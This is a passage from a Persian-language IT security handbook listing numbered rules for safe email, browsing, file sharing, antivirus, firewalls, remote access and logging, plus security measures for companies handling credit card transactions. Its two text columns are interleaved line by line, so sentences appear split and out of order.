‫ﻣﻄﻤﺌﻦ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﻫﻢ ﭘﺮﻫﻴﺰ ﻛﻨﻴﺪ‪ ،‬ﻣﮕـﺮ ﺁﻧﻜـﻪ‬
‫ﻧﻈﺮ ﺭﺍ ﺑﻪ ﺷﻤﺎ ﻣﻲﺩﻫﺪ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﺁﮔﺎﻫﺎﻧﻪ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۶‬ﺍﮔﺮ ﺑﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮﻱ ﻓﺎﻳﻞ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺍﻳﺪ‪،‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۹‬ﺑﺮﻧﺎﻣﺔ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺁﻧﻬﺎ ﻧﻴﺰ ﻧﻜـﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ‬
‫ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﻔﻨﻨﻲ ‪ ١٩٧HTML‬ﺭﺍ ﭘـﺮﺩﺍﺯﺵ‬
‫ﺟﺪﻱ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﻧﻜﻨﺪ ﻭ ﺑﺮﺍﻱ ﺩﻳﮕﺮﺍﻥ ﻫﻢ ﺍﺭﺳﺎﻝ ﻧﻨﻤﺎﻳﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۷‬ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺴﻴﺎﺭ ﻛﺎﺭﺁﻣـﺪ ﻭ ﻣﻔﻴـﺪ‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۰‬ﺍﺯ ‪ ISP‬ﺧﻮﺩ ﺑﭙﺮﺳﻴﺪ ﻛﻪ ﺁﻳﺎ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ‬
‫ﺑﺎﺷﻨﺪ‪ ،‬ﻭﻟﻲ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎ ﻣﺮﺍﻗﺒﺖ ﻭ ﺁﮔﺎﻫﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﭘــﻴﺶ ﺍﺯ ﺗﺤﻮﻳــﻞ ﺑــﻪ ﺷــﻤﺎ ﺍﺯ ﻧﻈــﺮ ﻭﻳــﺮﻭﺱ ﻭ ﻳــﺎ‬
‫ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۸‬ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫـﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﺩﺳﺘﺮﺳـﻲ ﺭﺍﻫﺒـﺮﻱ‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۱‬ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻫﺎﻱ ﻭﺏ ﺍﻣﻜـﺎﻥ ‪ download‬ﻭ ﺍﺟـﺮﺍﻱ‬
‫ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﻧﺪ ‪ -‬ﻣﺜﻞ ﻣﺮﻭﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ‪ -‬ﺣﺘـﻲ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﺸﻜﻠـﺴﺎﺯ ﺑﺎﺷـﻨﺪ ﺭﺍ‬
‫ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺗﻚﻛﺎﺭﺑﺮﻩ ﻧﻴﺰ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺍﺯ ﺣـﺴﺎﺏ‬
‫ﻧﺪﻫﻴﺪ‪ ،‬ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻣﻄﻤﺌﻦ ﺑﺎﺷـﻴﺪ ﭘﺎﻳﮕـﺎﻩ ﻣﺮﺑﻮﻃـﻪ‬
‫ﻛﺎﺭﺑﺮﻱ ﺭﺍﻫﺒﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ‪.‬‬
‫ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۹‬ﺗﻤﺎﻡ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻛـﻪ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﻧﻴـﺴﺘﻨﺪ ﻳـﺎ‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۲‬ﻧﻤﺎﻳﺶ ﺁﺩﺭﺱ ﭘﺎﻳﮕﺎﻩ ﻭﺑـﻲ ﻛـﻪ ﻣـﺮﻭﺭ ﻣـﻲﻛﻨﻴـﺪ ﻭ‬
‫ﻛﺎﺭﺑﺮﺩ ﺯﻳﺎﺩﻱ ﻧﺪﺍﺭﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪.‬‬
‫ﺁﺩﺭﺳﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﺍﺗﺼﺎﻝ ﺑـﻪ ﺁﻥ ﻫـﺴﺘﻴﺪ ﺭﺍ ﻓﻌـﺎﻝ‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۰‬ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﻭﻳﺮﻭﺱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺍﺳﺖ‬ ‫ﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻫﻨﮕـﺎﻡ ﻣـﺮﻭﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻧﺎﺁﺷـﻨﺎ‬
‫ﺭﺍ ﺑﻪ ﻧﺮﻡ ﺍﻓـﺰﺍﺭ ﺿـﺪﻭﻳﺮﻭﺱ ﻣﺠﻬـﺰ ﻛﻨﻴـﺪ ﻭ ﺑـﺮﺍﻱ‬ ‫ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ‪ ،‬ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺟـﺎﺯﺓ‬
‫ﺩﺭﻳﺎﻓﺖ ﻧﺸﺎﻧﻬﺎﻱ ﺟﺪﻳﺪ ﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺭﻭﺯﺍﻧﻪ‬ ‫ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﻣﻲﺩﻫﻴﺪ‪.‬‬
‫ﺁﻧﺮﺍ ﺑﻪﺭﻭﺯ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۳‬ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ‪cookie‬ﻫﺎ ﺗﺤﺖ ﭼﻪ ﺷﺮﺍﻳﻄﻲ ﺩﺭ‬
‫ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺳـﺘﮕﺎﻩ ﺭﺍ ﺍﺯ ﻧﻈـﺮ ﻭﺟـﻮﺩ ﻭﻳـﺮﻭﺱ‪،‬‬
‫ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﮔﺮ ﻗﺎﺩﺭ ﺑﻪ ﻛﻨﺘﺮﻝ ﺁﻧﻬـﺎ‬
‫ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪.‬‬
‫ﻧﻴﺴﺘﻴﺪ )ﻣﺜﻞ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۱‬ﺣﺘﻲ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛـﻪ ﺑﻄـﻮﺭ ﺧـﺎﺹ ﺗﺤـﺖ‬ ‫ﻣﻲ ﻛﻨﻴﺪ(‪ ،‬ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﺧﻮﺩ‬
‫ﺗﻬﺎﺟﻢ ﻭﻳﺮﻭﺳﻬﺎ ﻗـﺮﺍﺭ ﻧﺪﺍﺭﻧـﺪ ‪ -‬ﻣﺜـﻞ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬ ‫ﺭﺍ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻧﻜﻨﻴﺪ‪.‬‬
‫ﻣﺒﺘﻨﻲ ﺑﺮ ﻳﻮﻧﻴﻜﺲ ‪ -‬ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﺷﻮﺩ‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۴‬ﭼﻨﺎﻧﭽﻪ ﻫﺮﮔﻮﻧﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﻭ ﻣﺤﺮﻣﺎﻧـﻪﺍﻱ‬
‫ﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﺩﻳﮕـﺮ ﻓﺮﺳـﺘﺎﺩﻩ‬
‫ﺭﻭﻱ ﺻﻔﺤﺔ ﻭﺏ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﺁﻣﺪ‪ ،‬ﭘـﺲ ﺍﺯ ﺍﺗﻤـﺎﻡ‬
‫ﻣﻲﺷﻮﻧﺪ ﺁﻟﻮﺩﻩ ﺑﻪ ﻭﻳﺮﻭﺱ ﻧﻤﻲﺑﺎﺷﻨﺪ ﻭ ﺑﺮﺍﻱ ﮔﻴﺮﻧﺪﻩ‬
‫ﻛﺎﺭ‪ ،‬ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ‪ ١٩٨‬ﺭﺍ ﭘـﺎﻙ ﻛﻨﻴـﺪ‪ .‬ﺍﮔـﺮ ﻗـﺎﺩﺭ ﺑـﻪ‬
‫ﺧﻄﺮﻱ ﺩﺭ ﺑﺮ ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫ﺍﻳﻨﻜﺎﺭ ﻧﻴﺴﺘﻴﺪ )ﻣﺜﻞ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤـﻮﻣﻲ‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۲‬ﺗﻤﺎﻡ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎﻳﺪ ﺑﺎ ﻳﻜﻲ ﺍﺯ ﺍﻧﻮﺍﻉ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗـﺶ‬ ‫ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ( ﺷـﺎﻳﺪ ﺑﻬﺘــﺮ ﺑﺎﺷـﺪ ﺍﺯ ﺍﻧﺠـﺎﻡ ﻛــﺎﺭ‬
‫ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪ ،‬ﭼـﻪ ﺑـﺼﻮﺭﺕ‬ ‫ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺭﻭﻱ ﺁﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﭙﺮﻫﻴﺰﻳﺪ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﻭﻱ ﻫﻤﺎﻥ ﺭﺍﻳﺎﻧﻪ ﻭ ﭼـﻪ ﺑـﺼﻮﺭﺕ ﻳـﻚ‬

‫‪197 HTML Fancy Scripts‬‬


‫‪199 File Sharing‬‬ ‫‪198 Cache‬‬
‫‪٢٠٧‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺗﻨﻬﺎ ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﺎ ﺩﺍﺩﻩﻫﺎ ﻛـﺎﺭ ﻛﻨﻨـﺪ‬ ‫ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ﺟﺪﺍﮔﺎﻧــﻪ ﺑــﺮﺍﻱ ﻣﺤﺎﻓﻈــﺖ ﺍﺯ ﺗﻤــﺎﻡ‬
‫ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ )ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ‬ ‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻳﻚ ﺷﺒﻜﻪ‪.‬‬
‫ﻣﺎﺷﻴﻨﻬﺎﻱ ‪ Windows‬ﺑﻪ ﺍﻳـﻦ ﻣﻌﻨـﻲ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻳـﺪ ﺍﺯ‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۳‬ﺍﮔﺮ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺍﺑﺰﺍﺭ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﺭﺍﻩ‬
‫ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ‪ NTFS‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ(‬
‫ﺩﻭﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻴﺪ‪ ،‬ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛـﻪ ﺍﺯ ﺍﻣﻨﻴـﺖ‬
‫ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﺭﺍ ﺭﻭﻱ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎ‪،‬‬ ‫•‬ ‫ﻣﺴﺘﺤﻜﻤﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ )ﺩﺭ ﺣﺎﻟﺖ ﺣـﺪﺍﻗﻠﻲ‪ ،‬ﺷﻨﺎﺳـﺔ‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ‪ ،‬ﻭ ﺗﻤﺎﻡ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ‬ ‫ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮ ﹺﺭ ﻣﻨﺎﺳﺐ( ﺗﺎ ﻣﺒـﺎﺩﺍ ﻣﻬﺎﺟﻤـﺎﻥ ﻧﻴـﺰ ﺍﺯ‬
‫ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ‪ .‬ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺍﻣـﻦ ﻛـﺮﺩﻥ‬ ‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻧﮕﺎﺭﺷــﻬﺎﻱ ﺟﺪﻳــﺪ ﺳﻴــﺴﺘﻢﻋﺎﻣﻠﻬــﺎ ﺁﺳــﺎﻧﺘﺮ ﺍﺯ‬ ‫ﻛﻨﻨﺪ‪.‬‬
‫ﻧﮕﺎﺭﺷﻬﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ﺍﺳﺖ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۴‬ﺛﺒــﺖ ﮔﺰﺍﺭﺷــﺎﺕ ﺑــﺮﺍﻱ ﻋﻤﻠﻜﺮﺩﻫــﺎ ﻭ ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ‬
‫ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﺿـﺪﻭﻳﺮﻭﺱ‬ ‫•‬ ‫ﺳﻴﺴﺘﻢ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﻣﻨﻄﻘـﻲ ﻓﻌـﺎﻝ ﺑﺎﺷـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻭ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬ ‫ﮔﺰﺍﺭﺷﺎﺕ ﺭﺍ ﻃﺒﻖ ﻳﻚ ﺭﻭﺍﻝ ﻣﺸﺨﺺ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ‬
‫ﻱ ﻛﺎﺭﺗﻬــﺎﻱ‬
‫ﻱ ﻓﺎﻳﻠﻬــﺎﻱ ﺩﺍﺩﻩﺍ ﹺ‬
‫ﺑــﺮﺍﻱ ﺭﻣﺰﮔــﺬﺍﺭ ﹺ‬ ‫•‬ ‫ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎﻳﺪ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﭘﻴﺸﺮﻓﺘﺔ ﺭﻣﺰﻧﮕﺎﺭﻱ‬ ‫ﻗﺎﻋﺪﺓ ‪ .۲۵‬ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺗـﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﺭﻭﺷـﻬﺎ ﻭ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ‪.‬‬ ‫ﺁﺯﻣﻮﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻣﻮﺭﺩ ﺑﺎﺯﺑﻴﻨﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ‬


‫ﺑﺎﻳﺪ ﻣﺮﺍﻗﺐ ﺑﻮﺩ ﻛـﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﻣـﻮﻗﺘﻲ‪ ٢٠٠‬ﺷـﺎﻣﻞ‬ ‫•‬ ‫ﺍﺷﻜﺎﻻﺕ ﺍﺣﺘﻤﺎﻟﻲ ﺭﺍ ﭘـﻴﺶ ﺍﺯ ﻭﻗـﻮﻉ ﺳـﺎﻧﺤﻪ ﺭﻓـﻊ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﻧﺸﺪﻩ ﻧﺒﺎﺷﻨﺪ‪ .‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻧﻴﺎﺯﻱ ﺑﻪ‬ ‫ﻛﻨﻴﺪ‪.‬‬
‫ﺁﻧﻬﺎ ﻧﺒﺎﺷﺪ ﻧﻪﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺍﺯ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﭘﺎﻙ ﺷﻮﻧﺪ‪،‬‬
‫ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﻃﻮﺭﻱ ﺣﺬﻑ ﻛﺮﺩ ﻛﻪ ﺩﻳﮕﺮ ﻗﺎﺑﻞ‬ ‫ﻓﻬﺮﺳﺖ ﺷﺮﻛﺘﻬﺎﻱ ﺍﺳﺘﻔﺎﺩﻩﻛﻨﻨﺪﻩ ﺍﺯ‬
‫ﺑﺎﺯﻳﺎﺑﻲ ﻫﻢ ﻧﺒﺎﺷﻨﺪ‪.‬‬ ‫ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ‬
‫ﺗﻤﺎﻡ ﺩﺳﺘﺮﺳـﻴﻬﺎ ﺑـﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺣـﺴﺎﺱ ﺑﺎﻳـﺪ ﺩﺭ‬ ‫•‬ ‫ﺍﻟﻒ( ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﻧﻴﺴﺖ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﮔﺰﺍﺭﺵ ﺛﺒﺖ ﺷﻮﻧﺪ‪ ،‬ﻭ ﺍﻳﻦ ﮔﺰﺍﺭﺷﺎﺕ ﺑﺎﻳﺪ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﺩﺭ ﻣﺤﻠﻲ ﻧﮕﻬﺪﺍﺭﻱ ﺷـﻮﻧﺪ‬ ‫•‬
‫ﺩﺭ ﻓﻮﺍﺻﻞ ﺯﻣﺎﻧﻲ ﻣﻌﻴﻦ ﺗﺤﺖ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧـﺪ‬
‫ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﺑﺎﺷﺪ‪.‬‬
‫ﺗﺎ ﻣﺸﻜﻼﺕ ﻳﺎ ﺧﻄﺎﻫﻬﺎﻱ ﺑـﺎﻟﻘﻮﻩ ﺁﺷـﻜﺎﺭ ﮔﺮﺩﻧـﺪ‪.‬‬
‫ﺍﻳﻦ ﮔﺰﺍﺭﺷﻬﺎ ﺑﺎﻳﺪ ﺩﺭ ﺩﻭ ﻓﺎﻳﻞ ﺛﺒﺘﻬﺎ ﻧﻮﺷﺘﻪ ﺷﻮﻧﺪ ﻭ‬ ‫ﺑﺮﺍﻱ ﺑﺎﺯ ﻛﺮﺩﻥ ﻗﻔـﻞ ﺭﺍﻳﺎﻧـﻪ ﺑﺎﻳـﺪ ﺍﺯ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬ ‫•‬
‫ﺍﺯ ﻧﺴﺨﺔ ﺩﻭﻡ ﺑﺎﻳﺪ ﺩﺭ ﺟﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻛـﻪ‬ ‫ﻞ ﺍﻓـﺮﺍﺩ‬
‫ﻣﺴﺘﺤﻜﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷـﺪﻩ ﺑﺎﺷـﺪ ﻭ ﺣـﺪﺍﻗ ﹺ‬
‫ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ ﻧﮕﻬـﺪﺍﺭﻱ‬ ‫ﻣﻤﻜﻦ ﺑﺎﻳﺪ ﺁﻧﺮﺍ ﺑﺪﺍﻧﻨﺪ‪.‬‬
‫ﻛﺮﺩ‪.‬‬ ‫ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﻓﺮﺩ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ‬ ‫•‬
‫ﻲ ﻫـﺸﺪﺍﺭﻫﺎﻱ‬
‫ﻫﻤﻮﺍﺭﻩ ﮔﺮﻭﻫﻬﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ‬ ‫•‬ ‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ؛ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴـﺖ‬
‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺍﮔﺮ ﻧﻘﻄﻪﺿﻌﻔﻲ ﮔﺰﺍﺭﺵ‬ ‫ﻓﻴﺰﻳﻜﻲ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﺩﺳﺘﺮﺳﻲ‬
‫ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﺍﺣﻴﺎﻧﹰﺎ ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﻲﺷﺪ‪،‬‬ ‫ﻓﻴﺰﻳﻜﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺁﻧـﺮﺍ ﺑـﺎ ﻳـﻚ‬
‫ﺳﺮﻳﻌﹰﺎ ﺍﺯ ﺁﻥ ﻣﻄﻠﻊ ﺷﻮﻳﺪ‪.‬‬ ‫ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﻳﺎ ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ‬
‫ﻛﻨﻴــﺪ ﻭ ﺑﺪﻳﻨﻮﺳــﻴﻠﻪ ﺗﻤــﺎﻡ ﺳــﺪﻫﺎﻱ ﺍﻣﻨﻴﺘــﻲ‬
‫ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺣﻤﻠﻪ‪ ،‬ﺗﻤﺎﻡ ﺍﺣﺘﻴﺎﻃﻬـﺎﻱ ﻣﻤﻜـﻦ‬ ‫•‬
‫ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ ﻭ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﻛــﺎﺭﺑﺮﺩﻱ )ﺑﺠــﺰ‬
‫ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﻩ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ( ﺭﺍ ﺩﻭﺭ ﺑﺰﻧﻴﺪ‪.‬‬
‫ﺟﻬﺖ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺩﺍﺩﻩﻫﺎ ﺑﺎﻳـﺪ ﺩﺭ‬ ‫•‬
‫ﺳﻄﺢ ﻓﺎﻳﻠﻬﺎ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ‪.‬‬
‫‪200 Temporary Files‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٠٨‬‬

